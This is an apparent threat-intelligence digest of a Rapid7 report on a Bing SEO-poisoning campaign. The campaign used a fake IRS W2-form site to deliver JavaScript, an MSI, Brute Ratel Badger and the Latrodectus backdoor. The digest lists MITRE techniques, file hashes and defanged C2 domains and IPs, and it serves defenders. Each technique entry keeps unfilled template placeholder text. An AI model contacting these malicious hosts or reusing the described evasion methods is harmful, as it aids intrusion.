Rapid7 outlines a campaign that hijacks W2-form searches via Bing, directing victims to a fake IRS site that downloads a malicious JavaScript file. The chain then drops Brute Ratel Badger, loads Latrodectus, and establishes C2 communications to execute additional payloads. #Latrodectus #BruteRatelBadger
Keypoints
- The campaign targets users searching for W2 forms using Bing, redirecting to a spoofed site to download malicious content.
- A CAPTCHA on the fake IRS site is used to entice interaction and trigger the download of a JavaScript file.
- The JavaScript file ultimately downloads and executes an MSI package, which drops a DLL containing Brute Ratel Badger.
- Brute Ratel Badger acts as a stager to download and inject Latrodectus, a stealthy backdoor for information gathering and command execution.
- Latrodectus then communicates with hard-coded Brute Ratel C2 domains and later loads additional payloads onto the host.
- attackers embed valid Authenticode certificates and obfuscate code to evade detection and prolong persistence.
MITRE Techniques
- [T1608.006] SEO Poisoning – Brief description of how it was used. Quote relevant content using bracket (‘Threat Actor employed SEO poisoning, ensuring their advertisement was listed first in search results’).
- [T1189] Drive-by Compromise – Brief description of how it was used. Quote relevant content using bracket (‘Upon successfully solving CAPTCHA, browser is directed to download a JavaScript file from another URL’).
- [T1059.007] Command and Scripting Interpreter: JavaScript – Brief description of how it was used. Quote relevant content using bracket (‘User executes the downloaded JavaScript file’).
- [T1027.009] Embedded Payloads – Brief description of how it was used. Quote relevant content using bracket (‘Brute Ratel payload is embedded within decrypted payload’).
- [T1027.010] Command Obfuscation – Brief description of how it was used. Quote relevant content using bracket (‘Downloaded JavaScript file contains commands broken up by commented lines to hinder analysis and anti-virus scanners’).
- [T1027.013] Encrypted/Encoded File – Brief description of how it was used. Quote relevant content using bracket (‘Latrodectus employs string decryption to hinder detection and analysis’).
- [T1140] Deobfuscate/Decode Files or Information – Brief description of how it was used. Quote relevant content using bracket (‘DLL dropped by MSI package contains XOR routine to decrypt the Brute Ratel payload’).
- [T1055.001] Dynamic-link Library Injection – Brief description of how it was used. Quote relevant content using bracket (‘Latrodectus DLLs are injected into the Explorer.exe process’).
- [T1071.001] Web Protocols – Brief description of how it was used. Quote relevant content using bracket (‘Brute Ratel and Latrodectus communicate with their C2 servers using HTTPS’).
Indicators of Compromise
- [File Hash] context – Form_Ver-14-00-21.js, F8121922AE3A189FBAE0B17C8F5E665E29E2E13B2E7144DABA4B382432B4949E (JS downloaded from a Google Firebase URL).
- [File Hash] context – BST.msi, 5b18441926e832038099acbe4a90c9e1907c9487ac14bdf4925ac170dddc24b6 (MSI downloaded from BST.msi URL).
- [File Hash] context – neuro.msi, D71BFAB9CCA5DF6A28E12BA51FE5EAF0F9151514B3FD363264513347A8C5CF3A (MSI downloaded from neuro.msi URL).
- [Domain] context – appointopia[.]com redirects to grupotefex[.]com/forms-pubs/about-form-w-2/.
- [IP] context – 85.208.108[.]63, 193.32.177[.]192 (hosts for BST.msi and vpn.msi respectively).
- [Domain] context – kurvabbr[.]pw, barsman[.]biz, bibidj[.]biz, garunt[.]biz (Brute Ratel C2 domains).
- [Domain] context – meakdgahup[.]com/live/, riscoarchez[.]com/live/, jucemaster[.]space/live/, finjuiceer[.]com/live/, trymeakafr[.]com/live/ (Latrodectus C2).
Read more: https://blog.rapid7.com/2024/07/24/malware-campaign-lures-users-with-fake-w2-form/